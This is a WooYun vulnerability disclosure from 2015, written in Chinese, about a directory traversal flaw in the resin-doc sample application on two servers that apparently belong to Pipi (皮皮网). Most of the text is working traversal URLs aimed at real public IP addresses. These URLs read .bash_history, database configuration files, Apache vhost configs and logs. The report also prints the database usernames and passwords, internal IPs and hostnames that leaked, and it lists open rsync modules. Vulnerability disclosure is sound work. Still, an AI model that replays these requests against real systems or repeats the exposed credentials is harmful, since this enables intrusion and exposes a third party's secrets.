乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-27: 细节已通知厂商并且等待厂商处理中 2015-02-01: 厂商已经主动忽略漏洞,细节向公众公开
皮皮网两台服务器目录遍历,泄漏较多敏感信息
resin-doc的目录遍历漏洞:
http://112.91.31.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/data/webservice/.bash_historyhttp://112.91.31.74:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/.bash_history
得到内网IP 10.0.1.74
http://112.91.31.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/webdoc/pipi.cn/gwptest/WEB-INF/classes/dbConfig.propertiesip=10.0.1.108dataBaseName=gamepipiuserName=pipigameadminpassword=pipigame&*(dbhttp://112.91.31.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/webdoc/pipi.cn/gwptest/WEB-INF/classes/dbConfigA.propertiesip=121.10.139.108port=3396dataBaseName=gamepipiuserName=pipigameadminpassword=pipigame&*(db
测试发现MySQL无法远程访问。 读取主机名:
http://112.91.31.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/server/apache2/conf/extra/httpd-vhosts.confhttp://gameadmin.pipi.cn/http://gameuser.pipi.cn/
74主机上的数据库配置:
http://112.91.31.74:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/webdoc/pipi.cn/game/admin//WEB-INF/classes/dbConfig.propertiesip=192.168.0.107dataBaseName=ppgplatformuserName=pipigameadminpassword=pipigame&*(db
rsync未授权访问,只有电影,影响不大:
121.10.139.87::pipi_movies_data2/121.10.139.88::pipi_movies_data2/
log泄漏敏感信息:
http://112.91.31.74:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/server/resin/log/stdout.log
删除resin-doc
危害等级:无影响厂商忽略
忽略时间:2015-02-01 23:08
暂无